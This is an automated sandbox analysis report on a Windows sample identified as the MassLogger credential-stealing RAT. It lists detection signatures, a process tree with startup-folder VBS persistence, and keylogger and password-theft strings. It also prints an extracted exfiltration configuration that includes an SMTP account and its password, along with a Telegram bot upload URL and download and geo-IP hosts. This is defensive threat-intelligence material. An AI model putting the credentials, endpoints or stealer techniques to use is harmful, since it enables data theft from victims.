Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ref#116670.exe

Overview

General Information

Sample name:Ref#116670.exe
Analysis ID:1567428
MD5:9d61b7e79d1b236cea4327b484a3d53f
SHA1:1df1ffda46b2710fbe2d415a508afd609d6723a4
SHA256:2c3a0cbf5b82b051c9d3db1307f68db266eba44352a8f750e5553dbc58b5cf91
Tags:exeuser-abuse_ch
Infos:

Detection

MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Ref#116670.exe (PID: 6648 cmdline: "C:\Users\user\Desktop\Ref#116670.exe" MD5: 9D61B7E79D1B236CEA4327B484A3D53F)
    • InstallUtil.exe (PID: 6780 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 6000 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • vdvfyt.exe (PID: 5704 cmdline: "C:\Users\user\AppData\Roaming\vdvfyt.exe" MD5: 9D61B7E79D1B236CEA4327B484A3D53F)
      • InstallUtil.exe (PID: 4956 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
{"EXfil Mode": "SMTP", "From": "sendpcamill@juguly.shop", "Password": "rEBS93U9rKLG", "Server": "juguly.shop", "To": "camill@juguly.shop", "Port": 587}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0xf527:$a1: get_encryptedPassword
        • 0xf84f:$a2: get_encryptedUsername
        • 0xf2c2:$a3: get_timePasswordChanged
        • 0xf3e3:$a4: get_passwordField
        • 0xf53d:$a5: set_encryptedPassword
        • 0x10e99:$a7: get_logins
        • 0x10b4a:$a8: GetOutlookPasswords
        • 0x1093c:$a9: StartKeylogger
        • 0x10de9:$a10: KeyLoggerEventArgs
        • 0x10999:$a11: KeyLoggerEventArgsEventHandler
        00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
          Click to see the 36 entries
          SourceRuleDescriptionAuthorStrings
          5.2.vdvfyt.exe.3ad97e0.3.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            0.2.Ref#116670.exe.6950000.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.Ref#116670.exe.3689550.2.raw.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
                0.2.Ref#116670.exe.3689550.2.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.2.Ref#116670.exe.3689550.2.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    Click to see the 18 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , ProcessId: 6000, ProcessName: wscript.exe
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , ProcessId: 6000, ProcessName: wscript.exe

                    Data Obfuscation

                    barindex
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Ref#116670.exe, ProcessId: 6648, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-03T15:20:35.641728+010028032742Potentially Bad Traffic192.168.2.549716132.226.247.7380TCP
                    2024-12-03T15:21:00.094889+010028032742Potentially Bad Traffic192.168.2.549774132.226.247.7380TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 5.2.vdvfyt.exe.3bf0660.2.raw.unpackMalware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "sendpcamill@juguly.shop", "Password": "rEBS93U9rKLG", "Server": "juguly.shop", "To": "camill@juguly.shop", "Port": 587}
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeReversingLabs: Detection: 18%
                    Source: Ref#116670.exeReversingLabs: Detection: 18%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeJoe Sandbox ML: detected
                    Source: Ref#116670.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Ref#116670.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49722 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49780 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.5:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.5:49738 version: TLS 1.2
                    Source: Ref#116670.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#116670.exe, 00000000.00000002.2269468767.00000000061F0000.00000004.08000000.00040000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003C35000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#116670.exe, 00000000.00000002.2269468767.00000000061F0000.00000004.08000000.00040000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003C35000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmp
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 4x nop then jmp 06A0ED77h0_2_06A0EA69
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 4x nop then jmp 06A0ED77h0_2_06A0EA78
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 4x nop then jmp 06A08AC8h0_2_06A088B9
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 4x nop then jmp 06A08AC8h0_2_06A088C8
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 4x nop then jmp 06A081A4h0_2_06A08130
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 4x nop then jmp 06A081A4h0_2_06A08140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 01285762h3_2_01285347
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 01285039h3_2_01284D88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 01285762h3_2_0128568F
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 06DBED77h5_2_06DBEA78
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 06DBED77h5_2_06DBEA69
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 06DB8AC8h5_2_06DB88C8
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 06DB8AC8h5_2_06DB88B9
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 06DB81A4h5_2_06DB8140
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 06DB81A4h5_2_06DB8130
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 00BE5782h7_2_00BE5367
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 00BE51B9h7_2_00BE4F08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 00BE5782h7_2_00BE56AF
                    Source: global trafficHTTP traffic detected: GET /RMDT HTTP/1.1Host: oshi.atConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /RMDT HTTP/1.1Host: oshi.atConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 194.15.112.248 194.15.112.248
                    Source: Joe Sandbox ViewIP Address: 172.67.177.134 172.67.177.134
                    Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49716 -> 132.226.247.73:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49774 -> 132.226.247.73:80
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49722 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49780 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /RMDT HTTP/1.1Host: oshi.atConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /RMDT HTTP/1.1Host: oshi.atConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: oshi.at
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287082945.0000000002D93000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.000000000290B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287082945.0000000002D93000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3283656497.0000000000413000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: http://ocsps.ssl.com0
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: http://ocsps.ssl.com0?
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: http://ocsps.ssl.com0_
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.000000000293D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.000000000293D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                    Source: Ref#116670.exe, 00000000.00000002.2250767887.0000000002681000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287082945.0000000002D93000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2498291909.0000000002951000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3283656497.0000000000413000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: Ref#116670.exe, 00000000.00000002.2250767887.0000000002681000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2498291909.0000000002951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at
                    Source: Ref#116670.exe, 00000000.00000002.2250767887.0000000002681000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2498291909.0000000002951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/RMDT
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3283656497.0000000000413000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228d
                    Source: InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228l
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2250767887.000000000272F000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2498291909.00000000029A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: Ref#116670.exe, vdvfyt.exe.0.drString found in binary or memory: https://www.ssl.com/repository0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.5:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.5:49738 version: TLS 1.2

                    System Summary

                    barindex
                    Source: 0.2.Ref#116670.exe.3689550.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Ref#116670.exe.3689550.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Ref#116670.exe.3689550.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
